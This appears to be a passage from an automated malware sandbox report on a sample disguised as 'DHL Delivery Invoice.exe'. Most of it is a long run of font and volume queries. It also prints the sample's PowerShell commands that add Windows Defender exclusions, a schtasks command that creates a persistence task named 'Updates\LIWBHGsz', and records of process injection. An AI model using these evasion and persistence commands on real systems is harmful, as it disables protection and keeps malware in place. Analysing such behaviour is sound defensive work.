                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 93954
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4257955179.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory written: C:\Users\user\Desktop\DHL Delivery Invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory written: C:\Users\user\AppData\Roaming\LIWBHGsz.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Invoice.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
